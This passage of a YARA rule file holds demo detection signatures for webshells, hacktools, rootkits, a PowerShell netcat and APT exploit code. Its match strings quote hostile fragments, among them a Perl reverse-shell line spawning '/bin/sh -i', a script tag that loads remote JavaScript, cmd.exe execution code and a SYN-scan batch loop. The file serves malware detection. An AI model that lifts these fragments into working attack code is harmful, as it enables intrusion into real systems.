+      $s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
+      $s1 = "Blast.bat /r 600" fullword ascii
+      $s2 = "Blast.bat /l Blast.bat" fullword ascii
+      $s3 = "Blast.bat /c 600" fullword ascii
+      $s4 = "start Clear.bat" fullword ascii
+      $s5 = "del Result.txt" fullword ascii
+      $s6 = "s syn %%i %%j 3306 /save" fullword ascii
+      $s7 = "start Thecard.bat" fullword ascii
+      $s10 = "setlocal enabledelayedexpansion" fullword ascii
+   condition: 
+      5 of them
+}
+
+rule Powershell_Netcat_RID2DF4 : DEMO SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects a Powershell version of the Netcat network hacking tool"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-10-10 10:53:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "[ValidateRange(1, 65535)]" fullword
+      $s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+      $s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_and_Exploit_CN_APT_HK_RID3243 : APT CHINA DEMO EXPLOIT T1100 WEBSHELL Webshell {
+   meta:
+      description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-10-10 13:57:41"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, EXPLOIT, T1100, WEBSHELL, Webshell"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+      $s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">" 
+      $s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">" 
+   condition: 
+      $a0 or ( all of ( $s* ) )
+}
+
+rule JSP_Browser_APT_webshell_RID303A : APT DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-10-10 12:30:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+      $a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+      $a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+      $a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+   condition: 
+      all of them
+}
+
+rule HKTL_DllInjection_RID2D62 : DEMO HKTL T1055 T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file DllInjection.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:29:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1055, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\BDoor\\DllInjecti" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Mithril_v1_45_Mithril_RID3082 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file Mithril.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:42:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "cress.exe" 
+      $s7 = "\\Debug\\Mithril." 
+   condition: 
+      all of them
+}
+
+rule HKTL_hkshell_hkrmv_RID2E15 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file hkrmv.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:59:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "/THUMBPOSITION7" 
+      $s6 = "\\EvilBlade\\" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FeliksPack3___PHP_Shells_phpft_RID3606 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phpft.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 16:38:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "PHP Files Thief" 
+      $s11 = "http://www.4ngel.net" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_indexer_RID2FAE : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file indexer.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:07:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r" 
+   condition: 
+      all of them
+}
+
+rule Webshell_r57shell_RID2D9C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file r57shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to" 
+   condition: 
+      all of them
+}
+
+rule HKTL_bdcli100_RID2B32 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file bdcli100.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 08:56:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "unable to connect to " 
+      $s8 = "backdoor is corrupted on " 
+   condition: 
+      all of them
+}
+
+rule HKTL_HYTop2006_rar_Folder_2006X2_RID314F : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2006X2.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 13:17:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Powered By " 
+      $s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this." 
+   condition: 
+      all of them
+}
+
+rule HKTL_rdrbs084_RID2B5C : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file rdrbs084.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:03:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Create mapped port. You have to specify domain when using HTTP type." 
+      $s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET" 
+   condition: 
+      all of them
+}
+
+rule Webshell_eBayId_index3_RID2F7E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file index3.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:59:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_phvayv_RID2F5D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phvayv.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "wrap=\"OFF\">XXXX</textarea></font><font face" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_casus15_2_RID2FD5 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file casus15.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:14:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "copy ( $dosya_gonder" 
+   condition: 
+      all of them
+}
+
+rule Webshell_installer_RID2E74 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file installer.cmd"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:15:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Restore Old Vanquish" 
+      $s4 = "ReInstall Vanquish" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_remview_2_RID304F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file remview.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:34:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<xmp>$out</" 
+      $s1 = ".mm(\"Eval PHP code\")." 
+   condition: 
+      all of them
+}
+
+rule Webshell_FeliksPack3___PHP_Shells_r57_RID34C2 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file r57.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 15:44:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']." 
+   condition: 
+      all of them
+}
+
+rule HKTL_HYTop2006_rar_Folder_2006X_RID311D : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2006X.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 13:08:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<input name=\"password\" type=\"password\" id=\"password\"" 
+      $s6 = "name=\"theAction\" type=\"text\" id=\"theAction\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_phvayv_2_RID2FEE : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phvayv.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:18:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font" 
+   condition: 
+      all of them
+}
+
+rule Webshell_elmaliseker_RID2F34 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file elmaliseker.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:47:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "javascript:Command('Download'" 
+      $s5 = "zombie_array=array(" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_tool_RID2E7D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file tool.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:16:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "\"\"%windir%\\\\calc.exe\"\")" 
+   condition: 
+      all of them
+}
+
+rule Webshell_BackDooR__fr__RID2F80 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file BackDooR (fr).php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:59:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include " 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_ntdaddy_RID2FA7 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file ntdaddy.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:06:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s" 
+   condition: 
+      all of them
+}
+
+rule Webshell_stview_nstview_RID30B7 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file nstview.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");" 
+   condition: 
+      all of them
+}
+
+rule Webshell_HYTop_DevPack_upload_RID325B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file upload.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 14:01:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<!-- PageUpload Below -->" 
+   condition: 
+      all of them
+}
+
+rule HKTL_PasswordReminder_RID2F2C : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file PasswordReminder.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:45:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "The encoded password is found at 0x%8.8lx and has a length of %d." 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_RemExp_2_RID2FA1 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file RemExp.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:05:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = " Then Response.Write \"" 
+      $s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_c99_RID2D94 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file c99.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:37:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce" 
+   condition: 
+      all of them
+}
+
+rule HKTL_dbgntboot_RID2C66 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file dbgntboot.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:47:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp" 
+      $s3 = "sth junk the M$ Wind0wZ retur" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_shell_RID2E05 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:56:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz" 
+      $s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s" 
+   condition: 
+      all of them
+}
+
+rule HKTL_hxdef100_RID2B43 : DEMO HKTL T1050 T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file hxdef100.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 08:59:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1050, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "RtlAnsiStringToUnicodeString" 
+      $s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" 
+      $s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH" 
+   condition: 
+      all of them
+}
+
+rule HKTL_rdrbs100_RID2B51 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file rdrbs100.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:01:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "Server address must be IP in A.B.C.D format." 
+      $s4 = " mapped ports in the list. Currently " 
+   condition: 
+      all of them
+}
+
+rule HKTL_hxdef100_2_RID2BD4 : DEMO HKTL T1050 T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file hxdef100.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:23:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1050, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\\\.\\mailslot\\hxdef-rkc000" 
+      $s2 = "Shared Components\\On Access Scanner\\BehaviourBlo" 
+      $s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webadmin_RID2DED : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file webadmin.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:52:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu" 
+   condition: 
+      all of them
+}
+
+rule Webshell_ASP_commands_RID2F3B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file commands.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:48:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID" 
+      $s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F" 
+   condition: 
+      all of them
+}
+
+rule HKTL_hkdoordll_RID2C66 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file hkdoordll.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:47:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is" 
+   condition: 
+      all of them
+}
+
+rule Webshell_r57shell_2_RID2E2D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file r57shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:03:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Mithril_v1_45_dllTest_RID3085 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file dllTest.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:43:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "syspath" 
+      $s4 = "\\Mithril" 
+      $s5 = "--list the services in the computer" 
+   condition: 
+      all of them
+}
+
+rule HKTL_dbgiis6cli_RID2C83 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file dbgiis6cli.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:52:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 
+      $s5 = "###command:(NO more than 100 bytes!)" 
+   condition: 
+      all of them
+}
+
+rule Webshell_remview_2003_04_22_RID304F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file remview_2003_04_22.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:34:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_test_RID2E7F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file test.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:17:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$yazi = \"test\" . \"\\r\\n\";" 
+      $s2 = "fwrite ($fp, \"$yazi\");" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Debug_cress_RID2D09 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file cress.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\Mithril " 
+      $s4 = "Mithril.exe" 
+   condition: 
+      all of them
+}
+
+rule Webshell_RhV_webshell_RID2F6B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file webshell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "RhViRYOzz" 
+      $s1 = "d\\O!jWW" 
+      $s2 = "bc!jWW" 
+      $s3 = "0W[&{l" 
+      $s4 = "[INhQ@\\" 
+   condition: 
+      all of them
+}
+
+rule Webshell_thelast_index3_RID3045 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file index3.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:32:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r" 
+   condition: 
+      all of them
+}
+
+rule HKTL_adjustcr_RID2C03 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file adjustcr.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:31:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$Info: This file is packed with the UPX executable packer $" 
+      $s2 = "$License: NRV for UPX is distributed under special license $" 
+      $s6 = "AdjustCR Carr" 
+      $s7 = "ION\\System\\FloatingPo" 
+   condition: 
+      all of them
+}
+
+rule Webshell_HYTop_AppPack_2005_RID309F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2005.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:47:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb" 
+   condition: 
+      all of them
+}
+
+rule Webshell_xssshell_RID2E1C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file xssshell.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:00:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
